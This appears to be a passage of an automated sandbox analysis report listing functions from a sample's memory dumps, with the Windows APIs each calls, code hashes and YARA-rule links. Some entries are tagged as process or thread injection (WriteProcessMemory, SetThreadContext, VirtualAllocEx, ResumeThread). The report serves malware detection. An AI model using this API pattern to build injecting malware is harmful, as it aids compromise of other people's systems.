Memory Dump Source

Source File: 00000005.00000002.609975631.0000000007E40000.00000040.00000001.sdmp, Offset: 07E40000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 426c4733152d7c9dd7be9029107c58caf7abbc59298dab5d3aa683aef7bfc8e1
Instruction ID: ed8d2b8bc607dcb50d24bc90e653879cdd5b9d9638ef36459e1fac1ae593de06
Opcode Fuzzy Hash: 426c4733152d7c9dd7be9029107c58caf7abbc59298dab5d3aa683aef7bfc8e1
Instruction Fuzzy Hash: 1321F8B54493806FE7128B25DC41FA2BFA8EF47720F1884D7EE849B293D2646909C771

Uniqueness

Uniqueness Score: -1.00%

Function 027EA468, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

EnumResourceNamesW.KERNELBASE(?,00000E90,?,?), ref: 027EA502

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: 36c29b010fa5a61e1056a2db7773e716b004fada2820dcd7085530b8ec62347e
Instruction ID: 3c089ebb9667f3a94c052b27c8407617e1b3800c0902ddbb3cfbcfb8c68bf64d
Opcode Fuzzy Hash: 36c29b010fa5a61e1056a2db7773e716b004fada2820dcd7085530b8ec62347e
Instruction Fuzzy Hash: E921A47250D3C06FD3138B259C51B62BFB8EF87A10F0A81DBE8848B553D2256919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 07E405AA, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 07E40629

Memory Dump Source

Source File: 00000005.00000002.609975631.0000000007E40000.00000040.00000001.sdmp, Offset: 07E40000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6fa265d2ef3130a95a760056038ad673c34c175c52c1c500b0291b4e030bed84
Instruction ID: d32f9299ebe33bff61fa798949c84986d9f4cd82a24c5f8554be2664dc7789db
Opcode Fuzzy Hash: 6fa265d2ef3130a95a760056038ad673c34c175c52c1c500b0291b4e030bed84
Instruction Fuzzy Hash: 3A219AB1601200AFEB21CF25DC84F66FBE8EF44310F0484AAEA8A8B652D371E504CB71

Uniqueness

Uniqueness Score: -1.00%

Function 07E40750, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000E90,51018C50,00000000,00000000,00000000,00000000), ref: 07E407E1

Memory Dump Source

Source File: 00000005.00000002.609975631.0000000007E40000.00000040.00000001.sdmp, Offset: 07E40000, based on PE: false

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 90aa6cf124e1d9e343157c2d9632221109e6a75cbf5a354564c9f2d682d11507
Instruction ID: b24efa7e1b5141321fb615be2738895e46a86350c034e438bfbbe81dc06b0ba6
Opcode Fuzzy Hash: 90aa6cf124e1d9e343157c2d9632221109e6a75cbf5a354564c9f2d682d11507
Instruction Fuzzy Hash: 1B21C471409380AFD7228F65DC44F56BFB8EF06314F0884EBEA449F153C265A509CB71

Uniqueness

Uniqueness Score: -1.00%

Function 07E40140, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNELBASE(?,00000E90,?,?), ref: 07E401D6

Memory Dump Source

Source File: 00000005.00000002.609975631.0000000007E40000.00000040.00000001.sdmp, Offset: 07E40000, based on PE: false

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: d62e2a844f952da8431bdb95b51bc19b176b5846dad244040e2b719229d325c4
Instruction ID: da22daf0004f7024bcf5542ca31eb41090fa8d65ba75435ac41e14fe9b4e86a1
Opcode Fuzzy Hash: d62e2a844f952da8431bdb95b51bc19b176b5846dad244040e2b719229d325c4
Instruction Fuzzy Hash: A421C5714093C06FD7128B25CC51F62BFB4EF87620F0981DBED849B653D264A919C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 027EB2FF, Relevance: 1.6, APIs: 1, Instructions: 74libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000E90), ref: 027EB39F

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 377b68f281366ee021fd46220ea6f116c6d935e22b2aaad2713b9b47e581bc89
Instruction ID: 346c750f73bdd4c7b277017815dba8fc4d45d95f6773885c95cdbead5b4c5c02
Opcode Fuzzy Hash: 377b68f281366ee021fd46220ea6f116c6d935e22b2aaad2713b9b47e581bc89
Instruction Fuzzy Hash: 922107710493846FE722CB10DC45F52FFA8EF46720F1880DAED859F193D2A8A949C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 027EB4EA, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E90), ref: 027EB569

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: e643051191f316704a818fd59b427109472d2b08d26bae77dfe3742de27220b2
Instruction ID: f5e4623df014e79cb2dcbf00b4befc66ad898d423832c4545fc83a5a17af223e
Opcode Fuzzy Hash: e643051191f316704a818fd59b427109472d2b08d26bae77dfe3742de27220b2
Instruction Fuzzy Hash: B121A172500704AFEB219B15CC84F6BFFACEF08714F14855BEE459B241D664E5088BB1

Uniqueness

Uniqueness Score: -1.00%

Function 027EAAAE, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 027EAB21

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: b649925f353ae899b8ac2a19a8a1916e0a9aa125d5dde55acf244f21fcfe4fd1
Instruction ID: fdb7c215930f14021188ec6ebc960c00e470c74190468bc2a1c2ca50d9a45c46
Opcode Fuzzy Hash: b649925f353ae899b8ac2a19a8a1916e0a9aa125d5dde55acf244f21fcfe4fd1
Instruction Fuzzy Hash: C3219F71600240AFEB20DF25DC85F66FBE8EF08710F1484AAEE499B241D775E504CB75

Uniqueness

Uniqueness Score: -1.00%

Function 027EAB78, Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 027EABE8

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: cb7c66156d73a25637393d6a60474b5e76a5beb0477abf539c39cc710ac595b5
Instruction ID: 411b58288b84686e01d092d5647c63b5dd89aca770f533cc750732df7f0ed08b
Opcode Fuzzy Hash: cb7c66156d73a25637393d6a60474b5e76a5beb0477abf539c39cc710ac595b5
Instruction Fuzzy Hash: 6E2192B65097C49FDB128B24DC85B51BFA8EF06224F0984DBDD85CF263E2749909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 027EA5C2, Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 027EA644

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 16c4d3971b99d07606017b1f66a151b5b9c9e52a182acf6d133f53ea04933e4d
Instruction ID: f20476937edfe6da52aa329ea7a46f4fffeb0ae26c855545f2af077e98ef2e9e
Opcode Fuzzy Hash: 16c4d3971b99d07606017b1f66a151b5b9c9e52a182acf6d133f53ea04933e4d
Instruction Fuzzy Hash: 9B21797140E3C0AFDB138B258C54A51BFB4DF47624F0D80CBE9858F2A3D2296809D772

Uniqueness

Uniqueness Score: -1.00%

Function 027EB5F2, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E90,51018C50,00000000,00000000,00000000,00000000), ref: 027EB66C

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e80c6e0b8ee5d54ed41d25d69542308ccb20fea13560284c26a266814289a875
Instruction ID: ff664936f845cc391bcfc969832f3b0661c1c83a2ac844a445ab726050bda995
Opcode Fuzzy Hash: e80c6e0b8ee5d54ed41d25d69542308ccb20fea13560284c26a266814289a875
Instruction Fuzzy Hash: 49215CB1600604AFEB20CF15DC84FA7BBE8FF08714F18846AEA469B251D764E909CA71

Uniqueness

Uniqueness Score: -1.00%

Function 07E404B4, Relevance: 1.6, APIs: 1, Instructions: 68injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07E40534

Memory Dump Source

Source File: 00000005.00000002.609975631.0000000007E40000.00000040.00000001.sdmp, Offset: 07E40000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6383eea6a72c998e3f8a1d0459430f82652cfb9c245a150e9a3dd66a3b54af0e
Instruction ID: 3fba5685006ddfb3ee4291fa2534e9659cdee75544af086005ed4e5a9f4fbf02
Opcode Fuzzy Hash: 6383eea6a72c998e3f8a1d0459430f82652cfb9c245a150e9a3dd66a3b54af0e
Instruction Fuzzy Hash: DE21B0765097C09FDB22CB25DC45A92FFF4EF07214F0984DFE9858B163D229A948DB21

Uniqueness

Uniqueness Score: -1.00%

Function 07E4082B, Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 07E408A0

Memory Dump Source

Source File: 00000005.00000002.609975631.0000000007E40000.00000040.00000001.sdmp, Offset: 07E40000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: be44a7d50e81de2c41fd3dffe81a89f5f98d286d2901001542b55c573715e809
Instruction ID: 67b0d104394d35375d7e53f10ac23e375bbd0b0861e0903ebd01c849658f7ac8
Opcode Fuzzy Hash: be44a7d50e81de2c41fd3dffe81a89f5f98d286d2901001542b55c573715e809
Instruction Fuzzy Hash: 8A21C3B19093C45FD712CB25DC55792BFE8EF06224F0984EAD985CF153D2649948CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 027EA3BF, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

EnumResourceTypesW.KERNEL32(?,00000E90,?,?), ref: 027EA43E

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: EnumResourceTypes
String ID:
API String ID: 29811550-0
Opcode ID: 024c4d026f0b961a9584c1036e322ffe141de78642dcfd67c5a06893d745a468
Instruction ID: 2df946903c7ba9e968ceac8296ea51afbc4c7cf56e0e6759ea82cc385ad68b69
Opcode Fuzzy Hash: 024c4d026f0b961a9584c1036e322ffe141de78642dcfd67c5a06893d745a468
Instruction Fuzzy Hash: 7A11E9715083806FD3118B15DC41F72FFB8EF86720F19819AED848B652D235B915C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 027EA89E, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32(?,00000E90,?,?), ref: 027EA916

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 35222b54a13753162ed607a2c61df41f9c24ad4332d4ef571306a8ca6ced6baa
Instruction ID: 240725dfe28c8aaf3de4459df6a99a041032bfb2cdcc65f3187a2dac0896e023
Opcode Fuzzy Hash: 35222b54a13753162ed607a2c61df41f9c24ad4332d4ef571306a8ca6ced6baa
Instruction Fuzzy Hash: E111E7715093807FD3128B16CC41F72BFB8EF86A20F09819BED488B652D225B915CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 027EBE2F, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 027EBE9A

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 90874a1b3eb6d0a87be9a187cdeedfa24378e8c3f9b7c705140966ce97650376
Instruction ID: fc7eb11cfde892a8a1844ad692b50700e9a6a22ae2c5a191f7300c5dfe5d2980
Opcode Fuzzy Hash: 90874a1b3eb6d0a87be9a187cdeedfa24378e8c3f9b7c705140966ce97650376
Instruction Fuzzy Hash: 13118471409380AFDB228F55DC44B62FFF4EF4A214F0884DAEE858B152D375A518DB71

Uniqueness

Uniqueness Score: -1.00%

Function 07E40782, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000E90,51018C50,00000000,00000000,00000000,00000000), ref: 07E407E1

Memory Dump Source

Source File: 00000005.00000002.609975631.0000000007E40000.00000040.00000001.sdmp, Offset: 07E40000, based on PE: false

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: bab74a183baa04246c78483445c06338a3b068e1b5b606d6f8339708e240c957
Instruction ID: 61bbf3917a21011a733fb6f81cc9b4300f73b3e8a9dfbfba94e9a3ed27fd54eb
Opcode Fuzzy Hash: bab74a183baa04246c78483445c06338a3b068e1b5b606d6f8339708e240c957
Instruction Fuzzy Hash: 2111C171400204EFEB21CF55DD44FA6FBA8EF05320F1484ABEE499B241D275A408CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 07E40413, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07E40478

Memory Dump Source

Source File: 00000005.00000002.609975631.0000000007E40000.00000040.00000001.sdmp, Offset: 07E40000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 103e3ae6843a982bab67a2020e5a886d8e306d475d94c0cc1b908b4b23b89d31
Instruction ID: 852035ebbf050f4e03b83bc3482f54428632897a626bacc6c59e3960eb4c9f3e
Opcode Fuzzy Hash: 103e3ae6843a982bab67a2020e5a886d8e306d475d94c0cc1b908b4b23b89d31
Instruction Fuzzy Hash: 25110476009780AFDB228F21DC40B52FFB4EF06320F0880DEEE858B563C275A558DB62

Uniqueness

Uniqueness Score: -1.00%

Function 027EB336, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000E90), ref: 027EB39F

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0c16db977efb7f6ad18c5626d2743e865815492df9a18bf026a31af999302392
Instruction ID: c7c904d5c46eafd09eb3966ef39889f8cea7bddc6d4ef0168dc255e5d4673322
Opcode Fuzzy Hash: 0c16db977efb7f6ad18c5626d2743e865815492df9a18bf026a31af999302392
Instruction Fuzzy Hash: 60110871500304AFFB20DB15DC42F66FF98EF05724F14945AEE455B281D2B5A508CA71

Uniqueness

Uniqueness Score: -1.00%

Function 07E4036C, Relevance: 1.6, APIs: 1, Instructions: 55threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,?), ref: 07E403CB

Memory Dump Source

Source File: 00000005.00000002.609975631.0000000007E40000.00000040.00000001.sdmp, Offset: 07E40000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: dc62f657b63f964dfacfda4d56d6ab9b930776cd1643b3668ea16dda7d690689
Instruction ID: bd7490c55bc3dd6c15229e4b15c57945e2cc97a7f3a0411997d151459f1f5dee
Opcode Fuzzy Hash: dc62f657b63f964dfacfda4d56d6ab9b930776cd1643b3668ea16dda7d690689
Instruction Fuzzy Hash: AD118CB55053849FDB118F15DC85E52FFE8EF06224F0980EAEE498B262D279E948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 07E406C2, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E90,51018C50,00000000,00000000,00000000,00000000), ref: 07E40715

Memory Dump Source

Source File: 00000005.00000002.609975631.0000000007E40000.00000040.00000001.sdmp, Offset: 07E40000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 088a7787df81f87bd415c99c94151627022deb4046db0f6cd5846b7dbbab08af
Instruction ID: 09f7fdab4ac511817f9facb2f1e572ca54009cc2af1ec382cf00d8748a7e987e
Opcode Fuzzy Hash: 088a7787df81f87bd415c99c94151627022deb4046db0f6cd5846b7dbbab08af
Instruction Fuzzy Hash: 6801D271501604AEE710DB15DC89FA6FBA8EF05720F1480ABEF489B241C6B4A5488AB2

Uniqueness

Uniqueness Score: -1.00%

Function 07E40866, Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 07E408A0

Memory Dump Source

Source File: 00000005.00000002.609975631.0000000007E40000.00000040.00000001.sdmp, Offset: 07E40000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 1e8e3ad2431033f7facfb21bf8553d2f95151184c08a58348eb9a1a3c386732d
Instruction ID: d5b69dd6f2e580b0b664bcdad35343b58aacffa8fde7052bf2c5868db58a1ef7
Opcode Fuzzy Hash: 1e8e3ad2431033f7facfb21bf8553d2f95151184c08a58348eb9a1a3c386732d
Instruction Fuzzy Hash: C001B1B1A012449FDB10CF2AE9857A6FB98EF04224F0894FBDE09CF242D674E444CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07E404EE, Relevance: 1.5, APIs: 1, Instructions: 47injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07E40534

Memory Dump Source

Source File: 00000005.00000002.609975631.0000000007E40000.00000040.00000001.sdmp, Offset: 07E40000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 09834f6b98a566ceee3104eca30dc825f3d45a028e08a2f4c66fc1cc4efe0f46
Instruction ID: 9ce4a0f1719a75f0510cc4973f59884f75af62750cdf423aa4caf8968c08e374
Opcode Fuzzy Hash: 09834f6b98a566ceee3104eca30dc825f3d45a028e08a2f4c66fc1cc4efe0f46
Instruction Fuzzy Hash: 8C016DB5601604DFDB20CF15E884B66FBE4EF04620F0894AAEE498B662D279E458DB61

Uniqueness

Uniqueness Score: -1.00%

Function 07E40186, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNELBASE(?,00000E90,?,?), ref: 07E401D6

Memory Dump Source

Source File: 00000005.00000002.609975631.0000000007E40000.00000040.00000001.sdmp, Offset: 07E40000, based on PE: false

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: cd572dddcb828d09a258daaa74fdf7ca306b8b16f65077641be5e288f001e8e3
Instruction ID: 0cffc9380d020a990de539ec3d2c436b0ce166c1ec8845c23e94668d099d361d
Opcode Fuzzy Hash: cd572dddcb828d09a258daaa74fdf7ca306b8b16f65077641be5e288f001e8e3
Instruction Fuzzy Hash: 28017172540600AFD710DF16DC86F26FBA8FB84B20F14856AED089B741E375B515CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 027EBE56, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 027EBE9A

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e38d21db26b4fd3b34f1fa270a24a6b4695efc4f9a224b902dec42a06e4405ac
Instruction ID: 41c8671a4778182165ac169e80f09d0d6ee7ab5d5bb94f848dd85080c4952c26
Opcode Fuzzy Hash: e38d21db26b4fd3b34f1fa270a24a6b4695efc4f9a224b902dec42a06e4405ac
Instruction Fuzzy Hash: 56015B31400640EFDB219F55D984B56FFE0FF08324F08999ADE4A5B611D376A418DB71

Uniqueness

Uniqueness Score: -1.00%

Function 07E4038E, Relevance: 1.5, APIs: 1, Instructions: 44threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,?), ref: 07E403CB

Memory Dump Source

Source File: 00000005.00000002.609975631.0000000007E40000.00000040.00000001.sdmp, Offset: 07E40000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: e692ff8e1e3c4ce26db25bdf12fe12b60f216eaf8a3382a7fabca351b9fdf64e
Instruction ID: ff40ce5b091dec5bb8d5786ea867a5f9a6c92d5671c7f4ba73a301838dfad22a
Opcode Fuzzy Hash: e692ff8e1e3c4ce26db25bdf12fe12b60f216eaf8a3382a7fabca351b9fdf64e
Instruction Fuzzy Hash: D401B175601644DFDB108F19E984BA6FFA4EF04224F08D0AADE098B652D275E448CA61

Uniqueness

Uniqueness Score: -1.00%

Function 07E4043A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07E40478

Memory Dump Source

Source File: 00000005.00000002.609975631.0000000007E40000.00000040.00000001.sdmp, Offset: 07E40000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b25c9ca9fae8911b243d796283f27bf5b59ff7926578775062ab5bdcdc766f83
Instruction ID: bbdee3fbc0a50d2733f642726cc08f89c9fef7c86ee53873c749250e483b7541
Opcode Fuzzy Hash: b25c9ca9fae8911b243d796283f27bf5b59ff7926578775062ab5bdcdc766f83
Instruction Fuzzy Hash: A201B176501600DFDB218F56E884B66FFA4EF04320F08C4AEDE8A4B612D275E458DF62

Uniqueness

Uniqueness Score: -1.00%

Function 027EA3EE, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

EnumResourceTypesW.KERNEL32(?,00000E90,?,?), ref: 027EA43E

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: EnumResourceTypes
String ID:
API String ID: 29811550-0
Opcode ID: bda52e8a168b853f5a039a1bcd5be707b367886bf2d6716001511fbac85f73b9
Instruction ID: ff22e2d11285ba3b32c6463febb52774a9ab9231df6dd0e479f849874df28f8d
Opcode Fuzzy Hash: bda52e8a168b853f5a039a1bcd5be707b367886bf2d6716001511fbac85f73b9
Instruction Fuzzy Hash: 8D01A272500600ABD210DF16DC82F22FBA8FB88B20F14811AED084B741E331F515CAE5

Uniqueness

Uniqueness Score: -1.00%

Function 027EA8C6, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32(?,00000E90,?,?), ref: 027EA916

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 22d9a8ccaa7d67739dc1bef12b405a4c0e1957c51266295de8ff22ef1a20604b
Instruction ID: 186a2bf558773db502ed8aca9e67c07c15c85edfef1e5846d48e0e284ff8b057
Opcode Fuzzy Hash: 22d9a8ccaa7d67739dc1bef12b405a4c0e1957c51266295de8ff22ef1a20604b
Instruction Fuzzy Hash: 6601A271500600ABD610DF16DC82F22FBA8FB88B20F14815AED084B741E335F515CAE5

Uniqueness

Uniqueness Score: -1.00%

Function 027EABB6, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 027EABE8

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: b1fbce70497196e30086eee3265f0149d42d734385fb7a9b8dfc944dd396390f
Instruction ID: 53bf2179170063b8814eedf284d36083f0a554c87809c2acb8103bc56e608702
Opcode Fuzzy Hash: b1fbce70497196e30086eee3265f0149d42d734385fb7a9b8dfc944dd396390f
Instruction Fuzzy Hash: 3001DF315016449FDB108F19D884766FF94EF04220F18C4ABDD0A9B212D2B9A408CB71

Uniqueness

Uniqueness Score: -1.00%

Function 027EA4B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

EnumResourceNamesW.KERNELBASE(?,00000E90,?,?), ref: 027EA502

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: 414181c6fc75d44fcfa1cde15313aee6a1271291b58cafa9ff6e508055f079cc
Instruction ID: ffbe3af7fc80c90a329a4489e42478871f09a5c3c49eda2c8a69ea7c7654e45e
Opcode Fuzzy Hash: 414181c6fc75d44fcfa1cde15313aee6a1271291b58cafa9ff6e508055f079cc
Instruction Fuzzy Hash: C101A272500600ABD210DF16DC82F22FBA8FB88B20F14811AED084B741E331F515CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 027EA612, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 027EA644

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: c6277e0ab1f49bbed3ef2383a8744b35ae25d1cc9070da819aca731c8657cbba
Instruction ID: f5ce5aa9daee4df0f75d7776b21b680b0c0596e48f5b53740d25d1fc26b00c9b
Opcode Fuzzy Hash: c6277e0ab1f49bbed3ef2383a8744b35ae25d1cc9070da819aca731c8657cbba
Instruction Fuzzy Hash: F4F0AF74900644DFDB108F15D884B62FFA0EF49720F08C09ADE4A5B356D6B9A408CA72

Uniqueness

Uniqueness Score: -1.00%

Function 04EFA925, Relevance: 1.5, APIs: 1, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?), ref: 04EFA960

Memory Dump Source

Source File: 00000005.00000002.608955364.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fbd6ce56b81f7c799879776eaf84dfd063053166a7bd33e633d921aeda1c1776
Instruction ID: e678ddee25e320bb8f11e22ac439a26b66670f4bcf2ba6626dbc1238e5e1736c
Opcode Fuzzy Hash: fbd6ce56b81f7c799879776eaf84dfd063053166a7bd33e633d921aeda1c1776
Instruction Fuzzy Hash: 59F03A31A40214DFDB264BA4DC54798BBB0AB08304F1440E9E74DAA292C2755AC0CF01

Uniqueness

Uniqueness Score: -1.00%

Function 04EFAA5D, Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 04EFAA85

Memory Dump Source

Source File: 00000005.00000002.608955364.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e962fa269b21d9b2e4e408e93f46f4676d480285fe3c641263db2ffb81407f62
Instruction ID: 3ef9f8e6bc56325dd43a15d691641057efb89589307d450b4e768e02f42bb1cd
Opcode Fuzzy Hash: e962fa269b21d9b2e4e408e93f46f4676d480285fe3c641263db2ffb81407f62
Instruction Fuzzy Hash: 68F0A034500204CFCB228B28CC4C7D9BBB0AB09318F1461D8D65DAB390D7745DC8CF01

Uniqueness

Uniqueness Score: -1.00%

Function 00DE025D, Relevance: .5, Instructions: 459COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.603247497.0000000000DE0000.00000040.00000040.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bfe323c49993c3766b8bfa83eb3e782792010b2494638737c3ebe732d095e82
Instruction ID: a7000caef2761736494bcc14380a973adf28601b526058beb32fca4ff6c606e8
Opcode Fuzzy Hash: 7bfe323c49993c3766b8bfa83eb3e782792010b2494638737c3ebe732d095e82
Instruction Fuzzy Hash: F94168A544E3C09FD7038B658C614917F74EE1722870A40DBD8C0CF6A3E2696A4EDBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00DE07AE, Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.603247497.0000000000DE0000.00000040.00000040.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ed0cbe7b8de94a05175e6d163ebbc7da450303b8826bb1ea281e3a7a13bb4e4
